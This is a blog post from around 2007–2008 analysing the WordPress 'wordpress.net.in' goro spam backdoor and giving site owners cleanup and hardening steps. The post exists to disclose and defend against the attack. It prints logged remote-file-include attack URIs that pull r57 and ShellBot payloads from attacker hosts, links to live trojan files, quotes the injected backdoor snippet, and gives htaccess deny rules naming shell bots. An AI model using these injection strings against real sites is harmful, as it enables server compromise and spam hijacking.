I’ve been monitoring mattheaton.com “wordpress.net.in goro spam injections” for this past few months. Noticeably, the blackhat spamming method is changing dramatically. For those who are still unaware of Wordpress Goro Spam please read my earlier post → Wordpress.net.in Spam injection& Gaming Bluehost & Hostmonster CEO’s Blog.

thinkingphp.org (PR6) & jensfrake.com (PR7) has been hijacked by “Wordpress Blackhat SEO Spammer” for this month. Both sites were running on WordPress 2.3.2.

By now the <div id=”goro”> signature has been replaced with “Inline CSS” wrapper.

Cloacking Check on Mattheaton.com

Normal Browser

32,246 characters - mattheaton-com-source.txt

Google bot

34,646 characters - mattheaton-com-googlebot-source.txt

Difference

2,400 characters

Cloacking Check on jensfrake.com & blog.jensfrake.com

Normal Browser

59,580 characters - blogjensfrakecom.txt

Google bot

59,699 characters - blogjensfrakecom-googlebot.txt

Difference

119 characters

While scanning jensfrake.com their server return 400-500 error, so we had to scan his (clone) subdomain blog.jensfrake.com instead of the main site

This time around, you wont see the spam on both of this website, all the spam links is position out of the client view-port (top -3337px, left -2227px).

another mathematical jokes, l33t.

<div style="left: -2227px; position: absolute; top: -3337px">

What’s new with Goro spam 2008

• WordPress <= 2.3.2 is vulnerable to this attack.
• Inject Spamlinks wrap with extra Inline CSS for cloacking
• Target High PR Sites → PR5 and above

Related Post

• Matt Heaton BlueHost HostMonster CEO’s Official Blog Hacked
• How to Removed Wordpress.net.in Spam Injection
• Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II

External Links

• National Vulnerabilities Database (NVD) on Wordpress 2.0 > 2.0.5 vulnerabilities

For this past three days this blog is suffering DOS attack . The attack is still alive now I don’t think they will leave yet.

I cant banned this bot directly as they were sending forge packet (packet spoofing) as googlebot http://www.whois-search.com/whois/64.233.166.136. Im still looking for the right ISP.

OrgName: Google Inc.
OrgID: GOGL
Address: 1600 Amphitheatre Parkway
City: Mountain View
StateProv: CA
PostalCode: 94043
Country: US

At the time being I blocked all remote streams from their random host *.com and “perl bot signature” but blocking will not stop them from hammering this site. I’ll be sending 503 (Service Unavailable) on certain request so if you are having problem accessing this site please check back later.

Type of injections

There is lot uri parameter in my logs (I will disabled server logs - limit resources) they probably has a large inventories check-lists of known CMS vulnerabilities. I can only confirm that its a blackhat seo spams bot as they request uri include the typical order.php page.

/es/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-ja
 gger-goro-class-mailphp/order.php/?wp=http://hom3.t35.com/xpl/hack/id.txt?
/es/wordpress/order.php/?wp=http://hom3.t35.com/xpl/hack/id.txt?
/order.php?wp=http://hom3.t35.com/xpl/hack/id.txt?

To view the following source you need to exclude the website host from your anti-virus program.

• Perl/ShellBot.B trojan - http://hom3.t35.com/xpl/fidz/hack/bnc.txt
• PHP/Rst.S Trojan - http://hom3.t35.com/xpl/fidz

htaccess blocked bad Code Injector and Perl Bot (Botnet)

If you has similar problems. you should block the following domain in your htaccess.
mod_setenvif

SetEnvIfNoCase Referer "^http://(www.)?t35\.com" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?jorgevolio\.com" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?emabe\.com" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?pawang\.in" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?gw-gold\.net" codeinjector_ref=1
SetEnvIfNoCase User-Agent "^libwww-perl*" shell_bots=1
SetEnvIfNoCase User-Agent "^Amidalla*" shell_bots=1

<FilesMatch "(.*)">
Order Allow,Deny
Allow from all
Deny from env=codeinjector_ref
Deny from env=shell_bots
</FilesMatch>

if u arent sure if you server support mod_setenvif wrap it like the below example.

<IfModule mod_setenvif.c>
#...replace this line with the above code...
</IfModule>

How to trap Perl Shell Bot

We need a pattern to trap this bots. certainly we knew that these bots :

• doesn’t honor robot.txt
• they crawl all subdirectory
• they has a pattern URI request

For now I only create subdirectory for auto-ban (and some other stuff) based on their pattern. alexa bot will be banned too as they dont honor robot.txt.

I’ll be updating this post from time to time. Do check the related articles on how to packet spoofing and validating forge/spoof packet.

Recent Scan & Update

The below list is automatically added.

December 24, 2007

ip: 64.26.63.10 param: login=,? inject: http://pawang.in/r57.txt

December 24, 2007

ip: 64.26.63.10 param: dir=,login= inject: http://pawang.in/r57.txt????

December 25, 2007

ip: 59.158.128.138 param: p=,:allinurl= inject: http://gw-gold.net/jpg/pictures/test.txt

External Resources

• Packet spoofing - http://www.wireshark.org
• pcapdiff validate forged packet http://www.eff.org/testyourisp/pcapdiff/

I found this while browsing WordPress support forum, some of these victims update their default_filters.php and upload class-mail.php inside their WordPress without being aware that it’s a backdoor (wordpress.net.in). There is no class-mail.php in WordPress except class-phpmailer.php. So don’t get confuse by it.

Below is a quick workaround on how you can removed the offending goro spamware injection before Google banned you from the internet pipes.

Workaround

• For temporary disable remote include in php.ini settings.

  ;;;;;;;;;;;;;;;;;;
  ; Fopen wrappers ;
  ;;;;;;;;;;;;;;;;;;
  
  ; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
  allow_url_fopen = off
  allow_url_include = off
  

• Check your .htaccess for suspicious redirect.
• Find class-mail.php inside “*/wp-includes/” directory and removed it.
• Find the following code inside “*/wp-includes/default_filters.php” and removed it

  add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775');
  function wpc7c16<>b8466d864eeefd20050625c7775() {
  @include('./wp-includes/class-mail.php');
  if(sizeof($wparr)>0){
  echo "!div id=\"goro\"!";
  foreach($wparr as $k=>$v){
  echo "“.ucwords($v[’key’]).”\n”;
  if($i++==$inum) break;
  }
  echo “!/div!”.$_footer;
  }
  }
  

• Robots.txt Exclusion

  Optional - Prevent googlebot from indexing the static spam page.
  Login to Wordpress Admin > Manage > Files > Other Files → Key in “Robots.txt”. Add the following code.

  User-agent: Googlebot
  Disallow: /*?*
  Disallow: /*?
  

  Refer robots.txt.

Possible WordPress class (suspicious) files that would be tempered

Md5 checksum the following files, compare it with official versions from WordPress Release Archive.

• wp-db.php
• gettext.php

The above methods only remove and disabled the spams links, there is no guarantee that it will protected you from future vulnerabilities. Backup (or export your post using WordPress eXtended RSS -WRX) and perform a full upgrade.

Dec 13, 2007

I just notice this recently. You’ll need to check your site HTTP Header. Most of the hijacked websites doesn’t response with correct HTTP Status Header (400<>500). My guess is they did this to cloak from being crawl by search engine spiders. If you had cleaned all the infected files and your header doesn’t response correctly get a rookit scanner.

Check your website status header, try cloak your browser (UA) as Search Engine Crawler. The following screenshot will show you how to setup this at web-sniffer.net.

This methods may not work if the cloaking scripts used IP base tracking. So try on different user agent string (ie: inoktomi, askjeeves, ia_archiver).

Firefox Browser

You can also override your useragent string with firefox ↓.

about:config → general.useragent.overide = ‘ua strings‘

Wordpress.net.in Backdoor

Extra info

Dec 14, 2007

I did some research at archive.org. It seem our wordpress.net.in Seo Spam has been going on since 2005. The first variant used file_get_contents() PHP functions to retrieve their sources code (A UTF MAP Decoder 1974 Php Class ).

I also found a signature name alxumuk (at MIT & wordpress.net.in). His first historic test can be root back at *.media.mit.edu/~? server (I hide the userid as it may be “false positive”). After my first search on google for alxumuk all the results has been scraped out by Google & “Google alert” so there is no references to this query in Google Index.

My query for file_get_contents include require allintext:1974.* (the UTF decode package) and the signature (alxumuk) will return 403 Forbidden.

As Google Advanced Search blocked “the query” this may confirm that 1974.* (UTF decode) is probably the package for reading the bootstrap for wordpress.net.in backdoor (similar case like perl.santy net worm).

If this is a true Net Worm, I suggest anyone with older versions of Wordpress should removed\ the meta generator tag (Wordpress versions) and disabled XML-RPC(& RSD) for hardening wordpress from remote vectors vulnerabilities.

Wordpress.net.in Doorway

Dec 24, 2007 → http://www.wordpress.net.in/mentors/alxumuk/

Backdoor Files

inside wp-includes directory.

• compat.php - (replace with latest version)
• class-mail.php delete

scan & removes all backdoor files and create a .htaccess file inside wp-includes & wp-content/plugins. Then add the following code to disabled directory listing (prevent informations leak & Directory search index).

Options -Indexes

Wordpress.net.in New Partner

Feb 23th 2008, We found a similar signature like wordpress.net.in at qwetro.com (germany). Probably from the same attacker with different agenda.

removes malicious create_function wp_head filters

This are fixes for wordpress.net.in spams header injection.

/**
 * Remove create_function action hook
 * append on wordpress wp_head filters
 *
 * @author Avice De'véreux <ck@kaizeku.com>
 * @copyright Copyright (c) 2006 Avice De'véreux
 * @version 1.0
 * @license http://www.gnu.org/licenses/lgpl.html GNU Lesser General Public License
 * @link http://blog.kaizeku.com/wordpress/goro-spam-injection-wp-head-patch/
 */
function remove_create_function_action()
{ global $wp_filter;

	$action_ref	= 'wp_head';
	$filter 	= $wp_filter[$action_ref];
	$_lambda	= array();

	foreach(range(1,10) as $priority){

		if (isset($filter[$priority]))
		{
			foreach($filter[$priority] as $registered_filter ){

				$callback = (string) $registered_filter['function'];

				if ( preg_match("/lambda/", $callback) ) {
		 	 		$_lambda[$priority][] = $callback;
				}
			}

		}
	}

	if ( count($_lambda) >= 0 ){

		foreach($_lambda as $priority => $callback) {
			if ( has_filter($action_ref,$callback) ){
				remove_filter($action_ref, $callback, $priority, 1);
			}
		}
	}
}

add_action('init','remove_create_function_action');

The plugin’s can be download at Kaizeku Ban, goro spam injection fixes

Related Posts

• Bluehost HostMonster CEO’s Blog hacked (wordpress.net.in)
• Matt Heaton Bluehost Hostmonster CEO’s Hacked Again - Strike II

External Links

• Websniffer View HTTP Request and Response Header
• Wordpress Support Forum
• National Vulnerability Database Wordpress 2.0 > 2.0.6

Short URL